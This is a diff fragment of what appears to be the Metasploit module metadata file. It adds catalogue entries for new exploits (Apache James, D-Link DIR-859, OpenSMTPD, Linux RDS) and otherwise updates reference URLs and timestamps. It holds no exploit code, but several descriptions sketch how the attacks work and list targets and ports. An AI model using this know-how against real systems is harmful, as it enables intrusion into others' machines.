+      "URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2",
+      "URL-https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-5333.html",
+      "URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7d11f77f84b27cef452cee332f4e469503084737",
+      "URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=15133f6e67d8d646d0744336b4daa3135452cb0d",
+      "URL-https://github.com/bcoles/kernel-exploits/blob/master/CVE-2018-5333/cve-2018-5333.c"
+    ],
+    "platform": "Linux",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-01-18 08:34:52 +0000",
+    "path": "/modules/exploits/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_linux/local/rds_rds_page_copy_user_priv_esc": {
     "name": "Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation",
     "fullname": "exploit/linux/local/rds_rds_page_copy_user_priv_esc",
@@ -61816,7 +61703,7 @@
       "BID-61966",
       "URL-http://blog.cmpxchg8b.com/2013/08/security-debianisms.html",
       "URL-http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/09/05/cve-2013-1662-vmware-mount-exploit"
+      "URL-https://blog.rapid7.com/2013/09/05/cve-2013-1662-vmware-mount-exploit"
     ],
     "platform": "Linux",
     "arch": "x86",
@@ -61830,7 +61717,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2018-10-10 14:35:34 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/local/vmware_mount.rb",
     "is_install_path": true,
     "ref_name": "linux/local/vmware_mount",
@@ -61869,7 +61756,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-04-30 06:25:48 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/linux/local/yum_package_manager_persistence.rb",
     "is_install_path": true,
     "ref_name": "linux/local/yum_package_manager_persistence",
@@ -62152,7 +62039,7 @@
     "description": "This module exploits a buffer overflow in the RTSP request parsing\n        code of Hikvision DVR appliances. The Hikvision DVR devices record\n        video feeds of surveillance cameras and offer remote administration\n        and playback of recorded footage.\n\n        The vulnerability is present in several models / firmware versions\n        but due to the available test device this module only supports\n        the DS-7204 model.",
     "references": [
       "CVE-2014-4880",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
+      "URL-https://blog.rapid7.com/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
     ],
     "platform": "Linux",
     "arch": "armle",
@@ -62167,7 +62054,7 @@
       "DS-7204 Firmware V2.2.10 build 131009",
       "Debug Target"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/misc/hikvision_rtsp_bof.rb",
     "is_install_path": true,
     "ref_name": "linux/misc/hikvision_rtsp_bof",
@@ -63755,6 +63642,50 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/smtp/apache_james_exec": {
+    "name": "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",
+    "fullname": "exploit/linux/smtp/apache_james_exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2015-10-01",
+    "type": "exploit",
+    "author": [
+      "Palaczynski Jakub",
+      "Matthew Aberegg",
+      "Michael Burkey"
+    ],
+    "description": "This module exploits a vulnerability that exists due to a lack of input\n        validation when creating a user. Messages for a given user are stored\n        in a directory partially defined by the username. By creating a user\n        with a directory traversal payload as the username, commands can be\n        written to a given directory. To use this module with the cron\n        exploitation method, run the exploit using the given payload, host, and\n        port. After running the exploit, the payload will be executed within 60\n        seconds. Due to differences in how cron may run in certain Linux\n        operating systems such as Ubuntu, it may be preferable to set the\n        target to Bash Completion as the cron method may not work. If the target\n        is set to Bash completion, start a listener using the given payload,\n        host, and port before running the exploit. After running the exploit,\n        the payload will be executed when a user logs into the system. For this\n        exploitation method, bash completion must be enabled to gain code\n        execution. This exploitation method will leave an Apache James mail\n        object artifact in the /etc/bash_completion.d directory and the\n        malicious user account.",
+    "references": [
+      "CVE-2015-7611",
+      "EDB-35513",
+      "URL-https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 25,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Bash Completion",
+      "Cron"
+    ],
+    "mod_time": "2020-02-19 18:57:08 +0000",
+    "path": "/modules/exploits/linux/smtp/apache_james_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/smtp/apache_james_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/smtp/exim4_dovecot_exec": {
     "name": "Exim and Dovecot Insecure Configuration Command Injection",
     "fullname": "exploit/linux/smtp/exim4_dovecot_exec",
@@ -64083,7 +64014,7 @@
     "references": [
       "CVE-2016-1560",
       "CVE-2016-1561",
-      "URL-https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials"
+      "URL-https://blog.rapid7.com/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials"
     ],
     "platform": "Unix",
     "arch": "cmd",
@@ -64097,7 +64028,7 @@
     "targets": [
       "Universal"
     ],
-    "mod_time": "2018-08-15 21:27:40 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/ssh/exagrid_known_privkey.rb",
     "is_install_path": true,
     "ref_name": "linux/ssh/exagrid_known_privkey",
@@ -64125,7 +64056,7 @@
       "URL-https://www.trustmatta.com/advisories/MATTA-2012-002.txt",
       "CVE-2012-1493",
       "OSVDB-82780",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/25/press-f5-for-root-shell"
+      "URL-https://blog.rapid7.com/2012/06/25/press-f5-for-root-shell"
     ],
     "platform": "Unix",
     "arch": "cmd",
@@ -64139,7 +64070,7 @@
     "targets": [
       "Universal"
     ],
-    "mod_time": "2018-08-15 21:27:40 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb",
     "is_install_path": true,
     "ref_name": "linux/ssh/f5_bigip_known_privkey",
@@ -64589,6 +64520,97 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/upnp/dlink_dir859_exec_ssdpcgi": {
+    "name": "D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi",
+    "fullname": "exploit/linux/upnp/dlink_dir859_exec_ssdpcgi",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-24",
+    "type": "exploit",
+    "author": [
+      "s1kr10s",
+      "secenv"
+    ],
+    "description": "D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.",
+    "references": [
+      "CVE-2019-20215",
+      "URL-https://medium.com/@s1kr10s/2e799acb8a73"
+    ],
+    "platform": "Linux",
+    "arch": "mipsbe",
+    "rport": "1900",
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-02-05 11:53:51 +0000",
+    "path": "/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb",
+    "is_install_path": true,
+    "ref_name": "linux/upnp/dlink_dir859_exec_ssdpcgi",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
+  "exploit_linux/upnp/dlink_dir859_subscribe_exec": {
+    "name": "D-Link DIR-859 Unauthenticated Remote Command Execution",
+    "fullname": "exploit/linux/upnp/dlink_dir859_subscribe_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-24",
+    "type": "exploit",
+    "author": [
+      "Miguel Mendez Z., <Miguel Mendez Z., @s1kr10s>",
+      "Pablo Pollanco P."
+    ],
+    "description": "D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP\n        interface. The vulnerability exists in /gena.cgi (function genacgi_main() in\n        /htdocs/cgibin), which is accessible without credentials.",
+    "references": [
+      "CVE-2019-17621",
+      "URL-https://medium.com/@s1kr10s/d94b47a15104"
+    ],
+    "platform": "Linux",
+    "arch": "mipsbe",
+    "rport": "49152",
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-01-13 13:18:43 +0000",
+    "path": "/modules/exploits/linux/upnp/dlink_dir859_subscribe_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/upnp/dlink_dir859_subscribe_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/upnp/dlink_upnp_msearch_exec": {
     "name": "D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection",
     "fullname": "exploit/linux/upnp/dlink_upnp_msearch_exec",
@@ -64651,7 +64673,7 @@
       "CVE-2013-0230",
       "OSVDB-89624",
       "BID-57608",
-      "URL-https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
+      "URL-https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
     ],
     "platform": "Linux",
     "arch": "x86, mipsbe",
@@ -64675,7 +64697,7 @@
       "Debian GNU/Linux 6.0 / MiniUPnPd 1.0",
       "Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb",
     "is_install_path": true,
     "ref_name": "linux/upnp/miniupnpd_soap_bof",
@@ -65244,7 +65266,7 @@
       "CVE-2014-8636",
       "CVE-2015-0802",
       "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=1120261",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636"
+      "URL-https://blog.rapid7.com/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636"
     ],
     "platform": "",
     "arch": "",
@@ -65259,7 +65281,7 @@
       "Universal (Javascript XPCOM Shell)",
       "Native Payload"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/browser/firefox_proxy_prototype.rb",
     "is_install_path": true,
     "ref_name": "multi/browser/firefox_proxy_prototype",
@@ -65552,7 +65574,7 @@
       "URL-http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx",
       "URL-http://schierlm.users.sourceforge.net/TypeConfusion.html",
       "URL-https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/03/29/cve-2012-0507--java-strikes-again"
+      "URL-https://blog.rapid7.com/2012/03/29/cve-2012-0507--java-strikes-again"
     ],
     "platform": "Java,Linux,OSX,Solaris,Windows",
     "arch": "",
@@ -65570,7 +65592,7 @@
       "Mac OS X x86 (Native Payload)",
       "Linux x86 (Native Payload)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/browser/java_atomicreferencearray.rb",
     "is_install_path": true,
     "ref_name": "multi/browser/java_atomicreferencearray",
@@ -65747,7 +65769,7 @@
       "URL-http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/",
       "URL-http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html",
       "URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day",
+      "URL-https://blog.rapid7.com/2012/08/27/lets-start-the-week-with-a-new-java-0day",
       "URL-https://bugzilla.redhat.com/show_bug.cgi?id=852051"
     ],
     "platform": "Java,Linux,Windows",
@@ -65764,7 +65786,7 @@
       "Windows Universal",
       "Linux x86"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/browser/java_jre17_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/browser/java_jre17_exec",
@@ -67259,7 +67281,7 @@
     "references": [
       "CVE-2016-5641",
       "URL-http://github.com/swagger-api/swagger-codegen",
-      "URL-https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641"
+      "URL-https://blog.rapid7.com/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641"
     ],
     "platform": "Java,NodeJS,PHP,Ruby",
     "arch": "nodejs, php, java, ruby",
@@ -67276,7 +67298,7 @@
       "Java JSP",
       "Ruby"
     ],
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/fileformat/swagger_param_inject.rb",
     "is_install_path": true,
     "ref_name": "multi/fileformat/swagger_param_inject",
@@ -69242,7 +69264,7 @@
     "references": [
       "URL-http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/",
       "URL-https://github.com/rapid7/metasploit-framework/pull/2461",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module"
+      "URL-https://blog.rapid7.com/2013/10/03/gestioip-authenticated-remote-command-execution-module"
     ],
     "platform": "Unix",
     "arch": "cmd",
@@ -69265,7 +69287,7 @@
     "targets": [
       "Automatic GestioIP 3.0"
     ],
-    "mod_time": "2018-08-09 23:34:03 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/gestioip_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/gestioip_exec",
@@ -69340,7 +69362,7 @@
     "description": "This module exploits CVE-2014-9390, which affects Git (versions less\n        than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions\n        less than 3.2.3) and describes three vulnerabilities.\n\n        On operating systems which have case-insensitive file systems, like\n        Windows and OS X, Git clients can be convinced to retrieve and\n        overwrite sensitive configuration files in the .git\n        directory which can allow arbitrary code execution if a vulnerable\n        client can be convinced to perform certain actions (for example,\n        a checkout) against a malicious Git repository.\n\n        A second vulnerability with similar characteristics also exists in both\n        Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where\n        certain Unicode codepoints are ignorable.\n\n        The third vulnerability with similar characteristics only affects\n        Mercurial clients on Windows, where Windows \"short names\"\n        (MS-DOS-compatible 8.3 format) are supported.\n\n        Today this module only truly supports the first vulnerability (Git\n        clients on case-insensitive file systems) but has the functionality to\n        support the remaining two with a little work.",
     "references": [
       "CVE-2014-9390",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial",
+      "URL-https://blog.rapid7.com/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial",
       "URL-http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html",
       "URL-http://article.gmane.org/gmane.linux.kernel/1853266",
       "URL-https://github.com/blog/1938-vulnerability-announced-update-your-git-clients",
@@ -69362,7 +69384,7 @@
       "Automatic",
       "Windows Powershell"
     ],
-    "mod_time": "2018-10-18 11:24:54 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/git_client_command_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/git_client_command_exec",
@@ -70147,7 +70169,7 @@
     "description": "ISPConfig allows an authenticated administrator to export language settings into a PHP script\n      which is intended to be reuploaded later to restore language settings. This feature\n      can be abused to run aribitrary PHP code remotely on the ISPConfig server.\n\n      This module was tested against version 3.0.5.2.",
     "references": [
       "CVE-2013-3629",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
     ],
     "platform": "PHP",
     "arch": "php",
@@ -70170,7 +70192,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-08-28 20:17:58 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/ispconfig_php_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/ispconfig_php_exec",
@@ -71509,7 +71531,7 @@
     "description": "This module exploits the Web UI for Metasploit Community, Express and\n        Pro where one of a certain set of Weekly Releases have been applied.\n        These Weekly Releases introduced a static secret_key_base value.\n        Knowledge of the static secret_key_base value allows for\n        deserialization of a crafted Ruby Object, achieving code execution.\n\n        This module is based on\n        exploits/multi/http/rails_secret_deserialization",
     "references": [
       "OVE-20160904-0002",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401",
+      "URL-https://blog.rapid7.com/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401",
       "URL-https://github.com/justinsteven/advisories/blob/master/2016_metasploit_rce_static_key_deserialization.md"
     ],
     "platform": "Ruby",
@@ -71533,7 +71555,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/metasploit_static_secret_key_base.rb",
     "is_install_path": true,
     "ref_name": "multi/http/metasploit_static_secret_key_base",
@@ -71762,7 +71784,7 @@
     "references": [
       "CVE-2013-3630",
       "EDB-28174",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
     ],
     "platform": "Linux,Unix",
     "arch": "cmd",
@@ -71785,7 +71807,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-05-10 14:02:01 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/moodle_cmd_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/moodle_cmd_exec",
@@ -71919,7 +71941,7 @@
     "description": "NAS4Free allows an authenticated user to post PHP code to a special HTTP script and have\n      the code executed remotely. This module was successfully tested against NAS4Free version\n      9.1.0.1.804. Earlier builds are likely to be vulnerable as well.",
     "references": [
       "CVE-2013-3631",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
     ],
     "platform": "PHP",
     "arch": "php",
@@ -71942,7 +71964,7 @@
     "targets": [
       "Automatic Target"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/nas4free_php_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/nas4free_php_exec",
@@ -72501,7 +72523,7 @@
     "description": "OpenMediaVault allows an authenticated user to create cron jobs as arbitrary users on the system.\n      An attacker can abuse this to run arbitrary commands as any user available on the system (including root).",
     "references": [
       "CVE-2013-3632",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
     ],
     "platform": "Linux,Unix",
     "arch": "cmd",
@@ -72524,7 +72546,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-08-28 20:17:58 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/openmediavault_cmd_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/openmediavault_cmd_exec",
@@ -74608,7 +74630,7 @@
     "references": [
       "CVE-2013-0156",
       "OSVDB-89026",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
+      "URL-https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
     ],
     "platform": "Ruby",
     "arch": "ruby",
@@ -74631,7 +74653,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/rails_xml_yaml_code_exec",
@@ -76976,7 +76998,7 @@
       "Unix (CMD In-Memory)",
       "Windows (CMD In-Memory)"
     ],
-    "mod_time": "2019-12-10 12:10:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/multi/http/vbulletin_widgetconfig_rce.rb",
     "is_install_path": true,
     "ref_name": "multi/http/vbulletin_widgetconfig_rce",
@@ -77163,7 +77185,7 @@
     "description": "vTiger CRM allows an authenticated user to upload files to embed within documents.\n      Due to insufficient privileges on the 'files' upload folder, an attacker can upload a PHP\n      script and execute arbitrary PHP code remotely.\n\n      This module was tested against vTiger CRM v5.4.0 and v5.3.0.",
     "references": [
       "CVE-2013-3591",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
     ],
     "platform": "PHP",
     "arch": "php",
@@ -77186,7 +77208,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-09-08 10:04:47 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/vtiger_php_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/vtiger_php_exec",
@@ -77722,7 +77744,7 @@
     "description": "ZABBIX allows an administrator to create scripts that will be run on hosts.\n      An authenticated attacker can create a script containing a payload, then a host\n      with an IP of 127.0.0.1 and run the arbitrary script on the ZABBIX host.\n\n      This module was tested against Zabbix v2.0.9.",
     "references": [
       "CVE-2013-3628",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
     ],
     "platform": "Linux,Unix",
     "arch": "cmd",
@@ -77745,7 +77767,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-09-07 21:18:50 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/zabbix_script_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/zabbix_script_exec",
@@ -80678,7 +80700,7 @@
       "Linux",
       "Mac OS X"
     ],
-    "mod_time": "2020-01-09 15:02:04 +0000",
+    "mod_time": "2020-02-19 09:32:34 +0000",
     "path": "/modules/exploits/multi/script/web_delivery.rb",
     "is_install_path": true,
     "ref_name": "multi/script/web_delivery",
@@ -80814,7 +80836,7 @@
       "CVE-2012-5958",
       "OSVDB-89611",
       "US-CERT-VU-922681",
-      "URL-https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
+      "URL-https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
     ],
     "platform": "Unix",
     "arch": "cmd",
@@ -80831,7 +80853,7 @@
       "Axis Camera M1011 5.20.1 UPnP/1.4.1",
       "Debug Target"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb",
     "is_install_path": true,
     "ref_name": "multi/upnp/libupnp_ssdp_overflow",
@@ -81913,7 +81935,7 @@
 
     ],
     "platform": "OSX",
-    "arch": "",
+    "arch": "x86, x64",
     "rport": null,
     "autofilter_ports": [
 
@@ -81924,7 +81946,7 @@
     "targets": [
       "Mac OS X"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-28 17:16:45 +0000",
     "path": "/modules/exploits/osx/local/persistence.rb",
     "is_install_path": true,
     "ref_name": "osx/local/persistence",
@@ -84589,7 +84611,7 @@
       "Cliff Stoll",
       "wvu <wvu@metasploit.com>"
     ],
-    "description": "This module exploits a SUID installation of the Emacs movemail utility\n        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.\n        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.",
+    "description": "This module exploits a SUID installation of the Emacs movemail utility\n        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.\n\n        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.",
     "references": [
       "URL-https://en.wikipedia.org/wiki/Movemail",
       "URL-https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg",
@@ -84610,7 +84632,7 @@
     "targets": [
       "/usr/lib/crontab.local"
     ],
-    "mod_time": "2018-12-03 12:22:40 +0000",
+    "mod_time": "2020-02-05 17:21:47 +0000",
     "path": "/modules/exploits/unix/local/emacs_movemail.rb",
     "is_install_path": true,
     "ref_name": "unix/local/emacs_movemail",
@@ -85120,7 +85142,7 @@
       "Cliff Stoll",
       "wvu <wvu@metasploit.com>"
     ],
-    "description": "This module exploits sendmail's well-known historical debug mode to\n        escape to a shell and execute commands in the SMTP RCPT TO command.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently only cmd/unix/reverse and cmd/unix/generic are supported.",
+    "description": "This module exploits sendmail's well-known historical debug mode to\n        escape to a shell and execute commands in the SMTP RCPT TO command.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently, only cmd/unix/reverse and cmd/unix/generic are supported.",
     "references": [
       "URL-https://en.wikipedia.org/wiki/Morris_worm",
       "URL-https://spaf.cerias.purdue.edu/tech-reps/823.pdf",
@@ -85139,7 +85161,7 @@
     "targets": [
       "@(#)version.c       5.51 (Berkeley) 5/2/86"
     ],
-    "mod_time": "2019-12-23 19:02:13 +0000",
+    "mod_time": "2020-02-05 19:13:19 +0000",
     "path": "/modules/exploits/unix/smtp/morris_sendmail_debug.rb",
     "is_install_path": true,
     "ref_name": "unix/smtp/morris_sendmail_debug",
@@ -85150,6 +85172,48 @@
     },
     "needs_cleanup": null
   },
+  "exploit_unix/smtp/opensmtpd_mail_from_rce": {
+    "name": "OpenSMTPD MAIL FROM Remote Code Execution",
+    "fullname": "exploit/unix/smtp/opensmtpd_mail_from_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-01-28",
+    "type": "exploit",
+    "author": [
+      "Qualys",
+      "wvu <wvu@metasploit.com>",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "This module exploits a command injection in the MAIL FROM field during\n        SMTP interaction with OpenSMTPD to execute code as the root user.",
+    "references": [
+      "CVE-2020-7247",
+      "URL-https://www.openwall.com/lists/oss-security/2020/01/28/3"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 25,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "OpenSMTPD >= commit a8e222352f"
+    ],
+    "mod_time": "2020-02-06 11:03:00 +0000",
+    "path": "/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/smtp/opensmtpd_mail_from_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_unix/smtp/qmail_bash_env_exec": {
     "name": "Qmail SMTP Bash Environment Variable Injection (Shellshock)",
     "fullname": "exploit/unix/smtp/qmail_bash_env_exec",
@@ -87592,7 +87656,7 @@
       "URL-http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/",
       "URL-https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8",
       "URL-http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/08/15/time-to-patch-joomla"
+      "URL-https://blog.rapid7.com/2013/08/15/time-to-patch-joomla"
     ],
     "platform": "PHP",
     "arch": "php",
@@ -87615,7 +87679,7 @@
     "targets": [
       "Joomla 2.5.x <=2.5.13 / Joomla 3.x <=3.1.4"
     ],
-    "mod_time": "2018-08-20 15:43:07 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/unix/webapp/joomla_media_upload_exec.rb",
     "is_install_path": true,
